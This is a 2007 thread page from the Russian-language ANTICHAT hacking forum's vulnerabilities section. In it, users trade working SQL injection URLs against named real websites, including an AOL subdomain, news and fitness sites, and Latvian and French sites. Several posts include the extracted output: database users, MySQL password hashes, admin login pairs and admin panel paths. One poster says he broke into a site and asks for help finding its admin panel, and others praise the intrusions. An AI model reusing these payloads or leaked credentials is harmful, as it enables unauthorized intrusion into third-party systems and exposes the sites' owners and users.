ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4131  
Старый 20.12.2007, 18:53
ak-TEP
Новичок
Регистрация: 17.11.2006
Сообщений: 15
Провел на форуме:
253749

Репутация: 37
По умолчанию

ability.aol.com
Код:
http://ability.aol.com/ability/index.php?ID=45&catID=-6+union+select+1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1)
4.1.14-standard-log:ability_admin@64.12.167.11:aol_ability
 
Ответить с цитированием

  #4132  
Старый 20.12.2007, 21:11
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* подобрал пароль и юзера....а вот админку райти не могу....помагите найти плизз))
 
Ответить с цитированием

  #4133  
Старый 20.12.2007, 21:26
TEAM MUSLEMEN
Новичок
Регистрация: 22.11.2007
Сообщений: 3
Провел на форуме:
12391

Репутация: 11
Thumbs up

HelO

http://www.topfitness.ro

Цитата:
http://www.topfitness.ro/viewdetails.php?t=2&id=-2+union+select+1,2,3,user,5,6/**/from/**/mysql.user
USER
SORS

Цитата:
http://www.topfitness.ro/viewdetails.php?t=2&id=-2+union+select+1,2,3,password,5,6/**/from/**/mysql.user
pass hash MYSQL
255B543308FCC38F

admin panel
http://www.topfitness.ro/admin/

 
Ответить с цитированием

  #4134  
Старый 20.12.2007, 23:13
TEAM MUSLEMEN
Новичок
Регистрация: 22.11.2007
Сообщений: 3
Провел на форуме:
12391

Репутация: 11
По умолчанию

Цитата:
Сообщение от ak-TEP  
ability.aol.com
Код:
http://ability.aol.com/ability/index.php?ID=45&catID=-6+union+select+1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1)
4.1.14-standard-log:ability_admin@64.12.167.11:aol_ability
good

Цитата:
http://ability.aol.com/ability/index.php?ID=1&catID=-1/**/union/**/select/**/11111,22222/**from/**/user
from name (USER)
 
Ответить с цитированием

  #4135  
Старый 20.12.2007, 23:44
TEAM MUSLEMEN
Новичок
Регистрация: 22.11.2007
Сообщений: 3
Провел на форуме:
12391

Репутация: 11
По умолчанию

Цитата:
Сообщение от Tigger  
http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* подобрал пароль и юзера....а вот админку райти не могу....помагите найти плизз))

Excellent work

Continued


Цитата:
http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,user,14,15,16,17,18,19,20,pass,22,23,24,25,2 6/**/from/**/users
use name
Usama

password hash
dcddb75469b4b4875094e14561e573d8


end password is
Цитата:
00000
Tigger You are excellent
 
Ответить с цитированием

  #4136  
Старый 21.12.2007, 00:15
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

Код HTML:
http://www.archaeolog.ru/index.php?id=2&id_nws=58+UNION+SELECT+1,2,3,4,concat(login,0x3a,pass,0x3a,email),6,7,8,9,10+FROM+userdata+LIMIT+1,1/*
Там же columns:
id, pid, fio, stepen, dolshnost, bio, login, pass, email, telephon

Последний раз редактировалось ~EviL~; 21.12.2007 в 03:00..
 
Ответить с цитированием

  #4137  
Старый 21.12.2007, 01:35
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

Цитата:
Сообщение от ~EviL~  
Код HTML:
http://www.trud.ru/issue/article.php?id=-200610131900802+UNION+SELECT+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14/*
Боян! Причем ты уже не первый кто за сегодня инъект на труде выкладывает =\\
 
Ответить с цитированием

  #4138  
Старый 21.12.2007, 02:15
netpingx
Новичок
Регистрация: 13.12.2007
Сообщений: 2
Провел на форуме:
2667

Репутация: 10
По умолчанию

http://baltbay.com/index.php?bloks=2&sad=13+union+select+user,2,3,pas sword,host,6,7,8,9,10,11,12,13+from+mysql.user/*

http://backipars.lv/kipars/index.php?sadala=13+union+select+user,2,3,password ,host,6,7,8,9,10,11,12,13+from+mysql.user/*

http://jauniesivero.lv/index.php?page=news&section=-1/**/union/**/select/**/11111,22222/**from/**/user

http://hostelturiba.lv/index.php?lang=13+union+select+user,2,3,password,h ost,6,7,8,9,10,11,12,13+from+mysql.user/*
 
Ответить с цитированием

  #4139  
Старый 21.12.2007, 10:52
5taY3r
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576

Репутация: 100
По умолчанию

www.unbureauenplus.fr
Код:
http://unbureauenplus.fr/index.php?dir=news&id=-7+union+select+concat_ws(0x3a,version(),user(),database()),2,3/*
5.0.44-log:unbureau_base1@10.0.78.3:unbureau_base1
Код:
http://unbureauenplus.fr/index.php?dir=news&id=-7+union+select+concat_ws(0x3a,pseudo,passe),2,3+from+papa_admin/*
логин:пасс
omi:1905
Цитата:
админка:_http://unbureauenplus.fr/admin/login.php
 
Ответить с цитированием

  #4140  
Старый 21.12.2007, 15:06
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Плиззз...ответьте на мой вопрос.
Я взломл сайт тимощука....http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,user,14,15,16,17,18,19,20,pass,22,23,24,25,2 6+from+users/* там лежат пароли и логин...но админку найте не могу...и можете сказать где админка и к чему могут подходить эти проли?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ